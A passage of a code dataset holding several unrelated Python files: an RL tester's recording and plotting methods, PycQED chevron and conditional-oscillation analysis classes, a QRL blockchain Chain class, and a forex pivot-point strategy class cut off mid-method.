len(state_num_list)\n print(\"file :%s[test] use temp is %s end test time %s, return %s, avg_state %s\" %\n (self.file, use_temp, self.time_step_holder.get_time(), avg_return, avg_state))\n self.add_custom_record(\"return\", self.time_step_holder.get_time(\n ), avg_return, x_name='time_step', y_name='return avg %s episodes' % self.episodes)\n\n return avg_return\n\n def end_check(self, satisfied_length, end_point):\n \"\"\"\n Check if average return value of recent satisfied_length number larger than end_point\n\n Parameters\n ----------\n satisfied_length : int\n\n end_point : int\n\n \"\"\"\n if end_point == None:\n return False\n else:\n if 'return' not in self.__custom_recorder:\n return False\n length = len(self.__custom_recorder['return'][\n self.__custom_recorder['return']['name'][1]])\n to_cal_return = self.__custom_recorder['return'][\n self.__custom_recorder['return']['name'][1]][length-satisfied_length:]\n avg_ret = sum(to_cal_return) / (len(to_cal_return) + 1)\n print(\n \"-----------------------------------recent return is %s -------------------------\" % avg_ret)\n if avg_ret >= end_point:\n return True\n else:\n return False\n\n def set_super_param(self, **argkw):\n \"\"\"\n This method is to record all of super parameters to test object.\n\n Place pass your parameters as follow format:\n self.set_super_param(param_a=a,param_b=b)\n\n Note: It is invalid to pass a local object to this function.\n\n Parameters\n ----------\n argkw : key-value \n for example: self.set_super_param(param_a=a,param_b=b)\n\n \"\"\"\n self.super_param = argkw\n\n def add_custom_record(self, key, x, y, x_name, y_name):\n \"\"\"\n This model is to add record to specific 'key'.\n After that, you can load plk file and call 'print' function to print x-y curve. 
\n\n Parameters\n ----------\n key : string\n identify your curve\n\n x: float or int\n x value to be added.\n\n y: float or int\n y value to be added.\n\n x_name: string\n name of x axis, will be displayed when call print function\n\n y_name: string\n name of y axis, will be displayed when call print function\n \"\"\"\n if key not in self.__custom_recorder:\n self.__custom_recorder[key] = {}\n self.__custom_recorder[key][x_name] = [x]\n self.__custom_recorder[key][y_name] = [y]\n self.__custom_recorder[key]['name'] = [x_name, y_name]\n else:\n self.__custom_recorder[key][x_name].append(x)\n self.__custom_recorder[key][y_name].append(y)\n self.serialize_object_and_save()\n\n def add_custom_data(self, key, data, dtype):\n if key not in self.__custom_data:\n if isinstance(dtype, list):\n self.__custom_data[key] = [data]\n else:\n self.__custom_data[key] = data\n else:\n if isinstance(dtype, list):\n self.__custom_data[key].append(data)\n else:\n self.__custom_data = data\n\n def __print_unit(self, key, style):\n if key in self.__custom_recorder:\n x_name, y_name = self.__custom_recorder[key]['name']\n plt.plot(self.__custom_recorder[key][\n x_name], self.__custom_recorder[key][y_name], style)\n plt.xlabel(x_name)\n plt.ylabel(y_name)\n else:\n print('[Tester plot wrong] key %s not exist. 
' % key)\n\n def print(self, key, style):\n \"\"\"\n plot single curve store in key.\n\n Parameters\n ----------\n key : string\n the id which has been set when call self.add_custom_record function\n\n style : string\n define the style of curve to be plot, for example : 'r-', 'go'\n\n \"\"\"\n self.__print_unit(key, style)\n\n def multi_print(self, key_list, style_list):\n \"\"\"\n plot several curve store in key_list.\n\n Parameters\n ----------\n key_list : array of string\n the id list which has been set when call self.add_custom_record function\n\n type_list: array of string\n\n\n \"\"\"\n for key, style in zip(key_list, style_list):\n self.__print_unit(key, style)\n\n def serialize_object_and_save(self):\n \"\"\"\n This method is to save test object to a pickle.\n This method will be call every time you call add_custom_record or other record function like self.check_and_test\n \"\"\"\n # remove object which can is not serializable\n if self.save_object:\n sess = self.session\n self.session = None\n with open(self.file, 'wb') as f:\n pickle.dump(self, f)\n self.session = sess\n\n def set_figure(self, fig):\n self.fig = fig\n\n def show(self):\n self.fig.show()\n\n def savefig(self, *argv, **argkw):\n self.fig.savefig(*argv, **argkw)\n\n def print_args(self):\n for key, value in self.super_param.items():\n print(\"key: %s, value: %s\" % (key, value))\n\n def save_suctom_object(self, class_name, ob):\n with open(self.file + '-'+class_name, 'wb') as f:\n pickle.dump(ob, f)\n","sub_path":"baselines/trpo_mpi/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":8725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"238413700","text":"import lmfit\nfrom uncertainties import ufloat\nfrom pycqed.analysis import measurement_analysis as ma\nfrom collections import OrderedDict\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nimport pycqed.analysis_v2.base_analysis as ba\nimport numpy as 
np\nfrom pycqed.analysis.tools.data_manipulation import \\\n populations_using_rate_equations\nfrom pycqed.analysis.tools.plotting import set_xlabel, set_ylabel, plot_fit, \\\n make_anglemap, make_segmented_cmap\nimport matplotlib.pyplot as plt\nfrom pycqed.analysis.fitting_models import CosFunc, Cos_guess, \\\n avoided_crossing_freq_shift\nfrom pycqed.analysis_v2.simple_analysis import Basic2DInterpolatedAnalysis\n\nfrom pycqed.analysis.analysis_toolbox import color_plot\n\nfrom matplotlib import colors\nfrom copy import deepcopy\nfrom pycqed.analysis.tools.plot_interpolation import interpolate_heatmap\n\nimport logging\n\nlog = logging.getLogger(__name__)\n\nclass Chevron_Analysis(ba.BaseDataAnalysis):\n def __init__(self, ts: str=None, label=None,\n ch_idx=0,\n coupling='g', min_fit_amp=0, auto=True):\n \"\"\"\n Analyzes a Chevron and fits the avoided crossing.\n\n Parameters\n ----------\n ts: str\n timestamp of the datafile\n label: str\n label to find the datafile (optional)\n ch_idx: int\n channel to use when fitting the avoided crossing\n coupling: Enum(\"g\", \"J1\", \"J2\")\n used to label the avoided crossing and calculate related quantities\n min_fit_amp:\n minimal maplitude of the fitted cosine for each line cut.\n Oscillations with a smaller amplitude will be ignored in the fit\n of the avoided crossing.\n auto: bool\n if True run all parts of the analysis.\n\n \"\"\"\n super().__init__(do_fitting=True)\n self.ts = ts\n self.label = label\n self.coupling = coupling\n self.ch_idx = ch_idx\n self.min_fit_amp = min_fit_amp\n if auto:\n self.run_analysis()\n\n def extract_data(self):\n self.raw_data_dict = OrderedDict()\n a = ma.MeasurementAnalysis(\n timestamp=self.ts, label=self.label, auto=False)\n a.get_naming_and_values_2D()\n a.finish()\n self.timestamps = [a.timestamp_string]\n self.raw_data_dict['timestamps'] = self.timestamps\n self.raw_data_dict['timestamp_string'] = a.timestamp\n for attr in ['sweep_points', 'sweep_points_2D', 
'measured_values',\n 'parameter_names', 'parameter_units', 'value_names',\n 'value_units']:\n self.raw_data_dict[attr] = getattr(a, attr)\n self.raw_data_dict['folder'] = a.folder\n\n def process_data(self):\n self.proc_data_dict = OrderedDict()\n\n # select the relevant data\n x = self.raw_data_dict['sweep_points']\n t = self.raw_data_dict['sweep_points_2D']\n Z = self.raw_data_dict['measured_values'][self.ch_idx].T\n\n # fit frequencies to each individual cut (time trace)\n freqs = []\n freqs_std = []\n fit_results = []\n amps = []\n for xi, z in zip(x, Z.T):\n CosModel = lmfit.Model(CosFunc)\n CosModel.guess = Cos_guess\n pars = CosModel.guess(CosModel, z, t)\n fr = CosModel.fit(data=z, t=t, params=pars)\n amps.append(fr.params['amplitude'].value)\n freqs.append(fr.params['frequency'].value)\n freqs_std.append(fr.params['frequency'].stderr)\n fit_results.append(fr)\n # N.B. the fit results are not saved in self.fit_res as this would\n # bloat the datafiles.\n self.proc_data_dict['fit_results'] = np.array(fit_results)\n self.proc_data_dict['amp_fits'] = np.array(amps)\n self.proc_data_dict['freq_fits'] = np.array(freqs)\n self.proc_data_dict['freq_fits_std'] = np.array(freqs_std)\n\n # take a Fourier transform (nice for plotting)\n fft_data = abs(np.fft.fft(Z.T).T)\n fft_freqs = np.fft.fftfreq(len(t), d=t[1]-t[0])\n sort_vec = np.argsort(fft_freqs)\n\n fft_data_sorted = fft_data[sort_vec, :]\n fft_freqs_sorted = fft_freqs[sort_vec]\n self.proc_data_dict['fft_data_sorted'] = fft_data_sorted\n self.proc_data_dict['fft_freqs_sorted'] = fft_freqs_sorted\n\n def run_fitting(self):\n super().run_fitting()\n\n fit_mask = np.where(self.proc_data_dict['amp_fits'] > self.min_fit_amp)\n\n avoided_crossing_mod = lmfit.Model(avoided_crossing_freq_shift)\n # hardcoded guesses! 
Bad practice, needs a proper guess func\n avoided_crossing_mod.set_param_hint('a', value=3e9)\n avoided_crossing_mod.set_param_hint('b', value=-2e9)\n avoided_crossing_mod.set_param_hint('g', value=20e6, min=0)\n params = avoided_crossing_mod.make_params()\n\n self.fit_res['avoided_crossing'] = avoided_crossing_mod.fit(\n data=self.proc_data_dict['freq_fits'][fit_mask],\n flux=self.raw_data_dict['sweep_points'][fit_mask],\n params=params)\n\n def analyze_fit_results(self):\n self.proc_data_dict['quantities_of_interest'] = {}\n # Extract quantities of interest from the fit\n self.proc_data_dict['quantities_of_interest'] = {}\n qoi = self.proc_data_dict['quantities_of_interest']\n g = self.fit_res['avoided_crossing'].params['g']\n qoi['g'] = ufloat(g.value, g.stderr)\n\n self.coupling_msg = ''\n if self.coupling == 'J1':\n qoi['J1'] = qoi['g']\n qoi['J2'] = qoi['g']*np.sqrt(2)\n self.coupling_msg += r'Measured $J_1$ = {} MHz'.format(\n qoi['J1']*1e-6)+'\\n'\n self.coupling_msg += r'Expected $J_2$ = {} MHz'.format(\n qoi['J2']*1e-6)\n elif self.coupling == 'J2':\n qoi['J1'] = qoi['g']/np.sqrt(2)\n qoi['J2'] = qoi['g']\n self.coupling_msg += r'Expected $J_1$ = {} MHz'.format(\n qoi['J1']*1e-6)+'\\n'\n self.coupling_msg += r'Measured $J_2$ = {} MHz'.format(\n qoi['J2']*1e-6)\n else:\n self.coupling_msg += 'g = {}'.format(qoi['g'])\n\n def prepare_plots(self):\n for i, val_name in enumerate(self.raw_data_dict['value_names']):\n self.plot_dicts['chevron_{}'.format(val_name)] = {\n 'plotfn': plot_chevron,\n 'x': self.raw_data_dict['sweep_points'],\n 'y': self.raw_data_dict['sweep_points_2D'],\n 'Z': self.raw_data_dict['measured_values'][i].T,\n 'xlabel': self.raw_data_dict['parameter_names'][0],\n 'ylabel': self.raw_data_dict['parameter_names'][1],\n 'zlabel': self.raw_data_dict['value_names'][i],\n 'xunit': self.raw_data_dict['parameter_units'][0],\n 'yunit': self.raw_data_dict['parameter_units'][1],\n 'zunit': self.raw_data_dict['value_units'][i],\n 'title': 
self.raw_data_dict['timestamp_string']+'\\n' +\n 'Chevron {}'.format(val_name)\n }\n\n self.plot_dicts['chevron_fft'] = {\n 'plotfn': plot_chevron_FFT,\n 'x': self.raw_data_dict['sweep_points'],\n 'xunit': self.raw_data_dict['parameter_units'][0],\n 'fft_freqs': self.proc_data_dict['fft_freqs_sorted'],\n 'fft_data': self.proc_data_dict['fft_data_sorted'],\n 'freq_fits': self.proc_data_dict['freq_fits'],\n 'freq_fits_std': self.proc_data_dict['freq_fits_std'],\n 'fit_res': self.fit_res['avoided_crossing'],\n 'coupling_msg': self.coupling_msg,\n 'title': self.raw_data_dict['timestamp_string']+'\\n' +\n 'Fourier transform of Chevron'}\n\n\ndef plot_chevron(x, y, Z, xlabel, xunit, ylabel, yunit,\n zlabel, zunit,\n title, ax, **kw):\n colormap = ax.pcolormesh(x, y, Z, cmap='viridis', # norm=norm,\n linewidth=0, rasterized=True,\n # assumes digitized readout\n vmin=0, vmax=1)\n set_xlabel(ax, xlabel, xunit)\n set_ylabel(ax, ylabel, yunit)\n ax.set_title(title)\n\n ax_divider = make_axes_locatable(ax)\n cax = ax_divider.append_axes('right', size='5%', pad='2%')\n cbar = plt.colorbar(colormap, cax=cax, orientation='vertical')\n cax.set_ylabel('L1 (%)')\n\n set_ylabel(cax, zlabel, zunit)\n\n\ndef plot_chevron_FFT(x, xunit, fft_freqs, fft_data, freq_fits, freq_fits_std,\n fit_res, coupling_msg, title, ax, **kw):\n\n colormap = ax.pcolormesh(x,\n fft_freqs, fft_data, cmap='viridis', # norm=norm,\n linewidth=0, rasterized=True, vmin=0, vmax=5)\n\n ax.errorbar(x=x, y=freq_fits, yerr=freq_fits_std, ls='--', c='r', alpha=.5,\n label='Extracted freqs')\n x_fine = np.linspace(x[0], x[-1], 200)\n plot_fit(x, fit_res, ax=ax, c='C1', label='Avoided crossing fit', ls=':')\n\n set_xlabel(ax, 'Flux bias', xunit)\n set_ylabel(ax, 'Frequency', 'Hz')\n ax.legend(loc=(1.05, .7))\n ax.text(1.05, 0.5, coupling_msg, transform=ax.transAxes)\n\n\nclass Conditional_Oscillation_Heatmap_Analysis(Basic2DInterpolatedAnalysis):\n \"\"\"\n Write some docstring explaining what we analyze\n \"\"\"\n def 
__init__(self,\n t_start: str = None,\n t_stop: str = None,\n label: str = '',\n data_file_path: str = None,\n close_figs: bool = True,\n options_dict: dict = None,\n extract_only: bool = False,\n do_fitting: bool = False,\n auto: bool = True,\n interp_method: str = 'linear',\n plt_orig_pnts: bool = True,\n plt_contour_phase: bool = True,\n plt_contour_L1: bool = True,\n plt_optimal_point: bool = False,\n clims: dict = None):\n\n self.plt_orig_pnts = plt_orig_pnts\n self.plt_contour_phase = plt_contour_phase\n self.plt_contour_L1 = plt_contour_L1\n self.plt_optimal_point = plt_optimal_point\n self.clims = clims\n\n cost_func_Names = {'Cost func', 'Cost func.', 'cost func',\n 'cost func.', 'cost function', 'Cost function', 'Cost function value'}\n L1_Names = {'L1', 'Leakage'}\n MF_Names = {'missing fraction', 'Missing fraction', 'missing frac',\n 'missing frac.', 'Missing frac', 'Missing frac.'}\n cond_phase_names = {'Cond phase', 'Cond. phase', 'Conditional phase',\n 'cond phase', 'cond. phase', 'conditional phase'}\n offset_diff_names = {'offset difference', 'offset diff',\n 'offset diff.', 'Offset difference', 'Offset diff',\n 'Offset diff.'}\n\n # also account for possible underscores instead of a spaces between words\n allNames = [cost_func_Names, L1_Names, MF_Names, cond_phase_names,\n offset_diff_names]\n [self.cost_func_Names, self.L1_Names, self.MF_Names, self.cond_phase_names,\n self.offset_diff_names] = \\\n [names.union({name.replace(' ', '_') for name in names})\n for names in allNames]\n\n cost_func_Names = {'Cost func', 'Cost func.', 'cost func',\n 'cost func.', 'cost function', 'Cost function', 'Cost function value'}\n L1_Names = {'L1', 'Leakage'}\n MF_Names = {'missing fraction', 'Missing fraction', 'missing frac',\n 'missing frac.', 'Missing frac', 'Missing frac.'}\n cond_phase_names = {'Cond phase', 'Cond. phase', 'Conditional phase',\n 'cond phase', 'cond. 
phase', 'conditional phase'}\n offset_diff_names = {'offset difference', 'offset diff',\n 'offset diff.', 'Offset difference', 'Offset diff',\n 'Offset diff.'}\n\n # also account for possible underscores instead of a spaces between words\n allNames = [cost_func_Names, L1_Names, MF_Names, cond_phase_names,\n offset_diff_names]\n [self.cost_func_Names, self.L1_Names, self.MF_Names, self.cond_phase_names,\n self.offset_diff_names] = \\\n [names.union({name.replace(' ', '_') for name in names})\n for names in allNames]\n\n super().__init__(\n t_start=t_start,\n t_stop=t_stop,\n label=label,\n data_file_path=data_file_path,\n close_figs=close_figs,\n options_dict=options_dict,\n extract_only=extract_only,\n do_fitting=do_fitting,\n auto=auto,\n interp_method=interp_method\n )\n\n def prepare_plots(self):\n # assumes that value names are unique in an experiment\n super().prepare_plots()\n anglemap = make_anglemap()\n\n for i, val_name in enumerate(self.proc_data_dict['value_names']):\n\n zlabel = '{} ({})'.format(val_name,\n self.proc_data_dict['value_units'][i])\n self.plot_dicts[val_name] = {\n 'ax_id': val_name,\n 'plotfn': color_plot,\n 'x': self.proc_data_dict['x_int'],\n 'y': self.proc_data_dict['y_int'],\n 'z': self.proc_data_dict['interpolated_values'][i],\n 'xlabel': self.proc_data_dict['xlabel'],\n 'x_unit': self.proc_data_dict['xunit'],\n 'ylabel': self.proc_data_dict['ylabel'],\n 'y_unit': self.proc_data_dict['yunit'],\n 'zlabel': zlabel,\n 'title': '{}\\n{}'.format(\n self.timestamp, self.proc_data_dict['measurementstring'])\n }\n\n if self.clims is not None and val_name in self.clims.keys():\n self.plot_dicts[val_name]['clim'] = self.clims[val_name]\n\n if self.plt_orig_pnts:\n self.plot_dicts[val_name + '_non_interpolated'] = {\n 'ax_id': val_name,\n 'plotfn': non_interpolated_overlay,\n 'x': self.proc_data_dict['x'],\n 'y': self.proc_data_dict['y']\n }\n\n if self.proc_data_dict['value_units'][i] == 'deg':\n self.plot_dicts[val_name]['cmap_chosen'] = 
anglemap\n\n if self.plt_contour_phase:\n # Find index of Conditional Phase\n z_cond_phase = None\n for j, val_name_j in enumerate(self.proc_data_dict['value_names']):\n pass\n if val_name_j in self.cond_phase_names:\n z_cond_phase = self.proc_data_dict['interpolated_values'][j]\n break\n\n if z_cond_phase is not None:\n self.plot_dicts[val_name + '_cond_phase_contour'] = {\n 'ax_id': val_name,\n 'plotfn': contour_overlay,\n 'x': self.proc_data_dict['x_int'],\n 'y': self.proc_data_dict['y_int'],\n 'z': z_cond_phase,\n 'colormap': anglemap,\n 'cyclic_data': True,\n 'contour_levels': [90, 180, 270],\n 'vlim': (0, 360)\n }\n else:\n log.warning('No data found named {}'.format(self.cond_phase_names))\n\n if self.plt_contour_L1:\n # Find index of Leakage or Missing Fraction\n z_L1 = None\n for j, val_name_j in enumerate(self.proc_data_dict['value_names']):\n pass\n if val_name_j in self.L1_Names or val_name_j in self.MF_Names:\n z_L1 = self.proc_data_dict['interpolated_values'][j]\n break\n\n if z_L1 is not None:\n vlim = (self.proc_data_dict['interpolated_values'][j].min(),\n self.proc_data_dict['interpolated_values'][j].max())\n\n contour_levels = np.array([1, 5, 10])\n # Leakage is estimated as (Missing fraction/2)\n contour_levels = contour_levels if \\\n self.proc_data_dict['value_names'][j] in self.L1_Names \\\n else 2 * contour_levels\n\n self.plot_dicts[val_name + '_L1_contour'] = {\n 'ax_id': val_name,\n 'plotfn': contour_overlay,\n 'x': self.proc_data_dict['x_int'],\n 'y': self.proc_data_dict['y_int'],\n 'z': z_L1,\n # 'unit': self.proc_data_dict['value_units'][j],\n 'contour_levels': contour_levels,\n 'vlim': vlim,\n 'colormap': 'hot',\n 'linestyles': 'dashdot'\n }\n else:\n log.warning('No data found named {}'.format(self.L1_Names))\n\n if val_name in set().union(self.L1_Names).union(self.MF_Names)\\\n .union(self.offset_diff_names):\n self.plot_dicts[val_name]['cmap_chosen'] = 'hot'\n\n if self.plt_optimal_point and val_name in self.cost_func_Names:\n 
optimal_pnt = self.proc_data_dict['optimal_pnt']\n optimal_pars = 'Optimal Parameters:'\n for key, val in optimal_pnt.items():\n optimal_pars += '\\n{}: {:4.3f} {}'.format(key, val['value'], val['unit'])\n self.plot_dicts[val_name + '_optimal_pars'] = {\n 'ax_id': val_name,\n 'ypos': -0.25,\n 'xpos': 0,\n 'plotfn': self.plot_text,\n 'box_props': 'fancy',\n 'line_kws': {'alpha': 0},\n 'text_string': optimal_pars,\n 'horizontalalignment': 'left',\n 'verticalaligment': 'top',\n 'fontsize': 16\n }\n\n def process_data(self):\n self.proc_data_dict = deepcopy(self.raw_data_dict)\n\n self.proc_data_dict['interpolated_values'] = []\n for i in range(len(self.proc_data_dict['value_names'])):\n if self.proc_data_dict['value_units'][i] == 'deg':\n interp_method = 'deg'\n else:\n interp_method = self.interp_method\n\n x_int, y_int, z_int = interpolate_heatmap(\n self.proc_data_dict['x'],\n self.proc_data_dict['y'],\n self.proc_data_dict['measured_values'][i],\n interp_method=interp_method)\n self.proc_data_dict['interpolated_values'].append(z_int)\n\n if self.proc_data_dict['value_names'][i] in self.cost_func_Names:\n # Find the optimal point acording to the cost function\n # optimal = max of cost func\n x = self.proc_data_dict['x']\n y = self.proc_data_dict['y']\n z = self.proc_data_dict['measured_values'][i]\n\n optimal_idx = z.argmin()\n self.proc_data_dict['optimal_pnt'] = {\n self.proc_data_dict['xlabel']: {'value': x[optimal_idx], 'unit': ''},\n self.proc_data_dict['ylabel']: {'value': y[optimal_idx], 'unit': ''}\n }\n for k, measured_value in enumerate(self.proc_data_dict['measured_values']):\n self.proc_data_dict['optimal_pnt'][self.proc_data_dict['value_names'][k]] = {'value': measured_value[optimal_idx], 'unit': self.proc_data_dict['value_units'][k]}\n\n self.proc_data_dict['x_int'] = x_int\n self.proc_data_dict['y_int'] = y_int\n\n def plot_text(self, pdict, axs):\n \"\"\"\n Helper function that adds text to a plot\n Overriding here in order to make the text bigger\n 
and put it below the the cost function figure\n \"\"\"\n pfunc = getattr(axs, pdict.get('func', 'text'))\n plot_text_string = pdict['text_string']\n plot_xpos = pdict.get('xpos', .98)\n plot_ypos = pdict.get('ypos', .98)\n fontsize = pdict.get('fontsize', 10)\n verticalalignment = pdict.get('verticalalignment', 'top')\n horizontalalignment = pdict.get('horizontalalignment', 'left')\n fontdict = {\n 'horizontalalignment': horizontalalignment,\n 'verticalalignment': verticalalignment\n }\n\n if fontsize is not None:\n fontdict['fontsize'] = fontsize\n\n # fancy box props is based on the matplotlib legend\n box_props = pdict.get('box_props', 'fancy')\n if box_props == 'fancy':\n box_props = self.fancy_box_props\n\n # pfunc is expected to be ax.text\n pfunc(x=plot_xpos, y=plot_ypos, s=plot_text_string,\n transform=axs.transAxes,\n bbox=box_props, fontdict=fontdict)\n\n\ndef non_interpolated_overlay(x, y, fig=None, ax=None, transpose=False, **kw):\n \"\"\"\n x, and y are lists.\n Args:\n x (array [shape: n*1]): x data\n y (array [shape: m*1]): y data\n fig (Object):\n figure object\n \"\"\"\n if ax is None:\n fig, ax = plt.subplots()\n\n color = 'w'\n edgecolors = 'gray'\n linewidth = 0.5\n\n if transpose:\n log.debug('Inverting x and y axis for non-interpolated points')\n ax.scatter(y, x, marker='.',\n color=color, edgecolors=edgecolors, linewidth=linewidth)\n else:\n ax.scatter(x, y, marker='.',\n color=color, edgecolors=edgecolors, linewidth=linewidth)\n\n return fig, ax\n\n\ndef contour_overlay(x, y, z, colormap, transpose=False,\n contour_levels=[90, 180, 270], vlim=(0, 360), fig=None,\n linestyles='dashed',\n cyclic_data=False,\n ax=None, **kw):\n \"\"\"\n x, and y are lists, z is a matrix with shape (len(x), len(y))\n N.B. 
The contour overaly suffers from artifacts sometimes\n Args:\n x (array [shape: n*1]): x data\n y (array [shape: m*1]): y data\n z (array [shape: n*m]): z data for the contour\n colormap (matplotlib.colors.Colormap or str): colormap to be used\n unit (str): 'deg' is a special case\n vlim (tuple(vmin, vmax)): required for the colormap nomalization\n fig (Object):\n figure object\n \"\"\"\n if ax is None:\n fig, ax = plt.subplots()\n\n vmin = vlim[0]\n vmax = vlim[-1]\n\n norm = colors.Normalize(vmin=vmin, vmax=vmax, clip=True)\n linewidth = 2\n fontsize = 'smaller'\n\n if transpose:\n y_tmp = np.copy(y)\n y = np.copy(x)\n x = y_tmp\n z = np.transpose(z)\n\n if cyclic_data:\n # Avoid contour plot artifact for cyclic data by removing the\n # data half way to the cyclic boundary\n minz = (vmin + np.min(contour_levels)) / 2\n maxz = (vmax + np.max(contour_levels)) / 2\n z = np.copy(z) # don't change the original data\n z[(z < minz) | (z > maxz)] = np.nan\n\n c = ax.contour(x, y, z,\n levels=contour_levels, linewidths=linewidth, cmap=colormap,\n norm=norm, linestyles=linestyles)\n ax.clabel(c, fmt='%.1f', inline='True', fontsize=fontsize)\n\n return fig, ax\n","sub_path":"pycqed/analysis_v2/fluxing_analysis.py","file_name":"fluxing_analysis.py","file_ext":"py","file_size_in_byte":23316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"591372424","text":"# coding=utf-8\n# Distributed under the MIT software license, see the accompanying\n# file LICENSE or http://www.opensource.org/licenses/mit-license.php.\nfrom typing import Optional, Dict\n\nfrom qrl.core import logger\nfrom qrl.core.Block import Block\nfrom qrl.core.StakeValidatorsTracker import StakeValidatorsTracker\nfrom qrl.core.AddressState import AddressState\nfrom qrl.core.Transaction import Transaction\nfrom qrl.core.Wallet import Wallet\n\n\nclass Chain:\n def __init__(self, state):\n self.pstate = state # FIXME: Is this really a parameter?\n self.wallet = 
Wallet() # FIXME: Why chain needs access to the wallet?\n self.blockchain = [] # FIXME: Everyone is touching this\n # FIXME: Remove completely and trust the db memcache for this\n\n @property\n def staking_address(self):\n return self.wallet.address_bundle[0].xmss.get_address().encode()\n\n @property\n def height(self):\n # FIXME: This will probably get replaced with rocksdb\n # FIXME: This is bad, height is not height but max index\n if len(self.blockchain):\n return self.blockchain[-1].block_number\n return 0\n\n def add_block(self,\n block: Block,\n address_state_dict: Dict[bytes, AddressState],\n stake_validators_tracker: StakeValidatorsTracker,\n next_seed,\n slave_xmss) -> bool:\n # TODO : minimum block validation in unsynced _state\n if block.block_number < self.height:\n logger.warning(\"Block already in the chain\")\n return False\n\n if self.height > 0:\n prev_block = self.blockchain[-1]\n if block.block_number != prev_block.block_number + 1:\n logger.warning('main: Block {} rejected. prev_block is not available.'.format(block.block_number))\n return False\n\n if prev_block.headerhash != block.prev_headerhash:\n logger.warning('main: Block {} rejected. 
prevheaderhash mismatch'.format(block.block_number))\n return False\n\n logger.debug('%s %s tx passed verification.', block.headerhash, len(block.transactions))\n\n self._commit(block=block,\n address_state_dict=address_state_dict,\n stake_validators_tracker=stake_validators_tracker,\n next_seed=next_seed,\n slave_xmss=slave_xmss)\n\n return True\n\n def _commit(self,\n block: Block,\n address_state_dict: Dict[bytes, AddressState],\n stake_validators_tracker: StakeValidatorsTracker,\n next_seed,\n slave_xmss,\n ignore_save_wallet=False):\n\n # FIXME: Check the logig behind these operations\n self.blockchain.append(block)\n\n batch = self.pstate.get_batch()\n\n self.pstate.update_vote_metadata(block, batch) # This has to be updated, before the pstate stake_validators\n\n self.pstate.update_stake_validators(stake_validators_tracker)\n\n for address in address_state_dict:\n self.pstate._save_address_state(address_state_dict[address], batch)\n\n for dup_tx in block.duplicate_transactions:\n if dup_tx.coinbase1.txto in self.pstate.stake_validators_tracker.sv_dict:\n # FIXME: Setting the property is invalid\n self.pstate.stake_validators_tracker.sv_dict[dup_tx.coinbase1.txto]._is_banned = True\n\n # This looks more like optimization/caching\n self.pstate.update_last_tx(block, batch)\n self.pstate.update_tx_metadata(block, batch)\n self.pstate.write_stake_validators_tracker(batch)\n self.pstate.write_prev_stake_validators_tracker(batch)\n self.pstate.update_next_seed(next_seed, batch)\n self.pstate.update_state_version(block.block_number, batch)\n self.pstate.update_slave_xmss(slave_xmss, batch)\n self.pstate.put_block(block, batch)\n self.pstate.write_batch(batch)\n\n if not ignore_save_wallet:\n self.wallet.save_wallet()\n\n logger.debug('#%s[%s]\\nWinner Stake Selector: %s has been committed.',\n block.block_number,\n block.headerhash,\n block.stake_selector)\n\n return True\n\n def load_state(self) -> bool:\n try:\n self.pstate.prev_stake_validators_tracker = 
StakeValidatorsTracker.from_json(self.pstate.get_prev_stake_validators_tracker())\n self.pstate.stake_validators_tracker = StakeValidatorsTracker.from_json(self.pstate.get_stake_validators_tracker())\n\n block_number = self.pstate.get_state_version()\n block = Block.from_json(self.pstate.get_block(block_number))\n self.blockchain.append(block)\n\n return True\n except Exception:\n return False\n\n def get_block(self, block_idx: int) -> Optional[Block]:\n # Block chain has not been loaded yet?\n # FIXME: Ensure that the chain is already in memory\n\n if len(self.blockchain) > 0:\n # FIXME: The logic here is not very clear\n inmem_start_idx = self.blockchain[0].block_number\n inmem_offset = block_idx - inmem_start_idx\n\n if inmem_offset < 0:\n return Block.from_json(self.pstate.get_block(block_idx))\n\n if inmem_offset < len(self.blockchain):\n return self.blockchain[inmem_offset]\n\n return None\n\n def get_transaction(self, transaction_hash)->Optional[Transaction]:\n answer = self.pstate.get_tx_metadata(transaction_hash)\n if answer is None:\n return None\n else:\n tx, _ = answer\n return tx\n\n # FIXME: We need a clear database schema\n def get_blockidx_from_txhash(self, transaction_hash):\n answer = self.pstate.get_tx_metadata(transaction_hash)\n if answer is None:\n return None\n else:\n _, block_index = answer\n return block_index\n\n def get_last_block(self) -> Optional[Block]:\n if len(self.blockchain) == 0:\n return None\n return self.blockchain[-1]\n\n def search(self, query):\n # FIXME: Refactor this. 
Prepare a look up in the DB\n for block in self.blockchain:\n for protobuf_tx in block.transactions:\n tx = Transaction.from_pbdata(protobuf_tx)\n if tx.txhash == query or tx.txfrom == query or tx.txto == query:\n logger.info('%s found in block %s', query, str(block.block_number))\n return tx\n return None\n","sub_path":"qrl/core/Chain.py","file_name":"Chain.py","file_ext":"py","file_size_in_byte":6643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"583902034","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 9 12:19:05 2017\n\n@author: jonfroiland\n\"\"\"\n\nfrom resistance import Resistance\nfrom support import Support\n\n\nclass Strategy(object):\n def __init__(self, instrument, dfD, mid, units, pivot,\n rl1, rl2, rl3, sl1, sl2, sl3, rate1, rate2):\n # self.api = api\n # self._id = _id\n self.instrument = instrument\n self.dfD = dfD\n self.mid = mid\n # self.bid = float(bid)\n # self.ask = float(ask)\n self.units = units\n self.pivot = pivot\n self.rl1 = rl1\n self.rl2 = rl2\n self.rl3 = rl3\n self.sl1 = sl1\n self.sl2 = sl2\n self.sl3 = sl3\n self.rate1 = rate1\n self.rate2 = rate2\n\n def resistance_check(self):\n if self.mid > self.dfD.iloc[-1]['Daily Pivot Point']:\n # print '**** Checking Resistance Pivots ****'\n resistance = Resistance(\n self.instrument, self.dfD, self.mid, self.units, self.pivot,\n self.rl1, self.rl2, self.rl3, self.sl1, self.sl2, self.sl3, self.rate1, self.rate2\n )\n units, stop_loss, profit = resistance.resistance()\n return units, stop_loss, profit\n\n def support_check(self):\n if self.mid < self.dfD.iloc[-1]['Daily Pivot Point']:\n # print '**** Checking Support Pivots ****'\n support = Support(\n self.instrument, self.dfD, self.mid, self.units, self.pivot,\n self.rl1, self.rl2, self.rl3, self.sl1, self.sl2, self.sl3, self.rate1, self.rate2\n )\n units, stop_loss, profit = support.support()\n return units, stop_loss, 
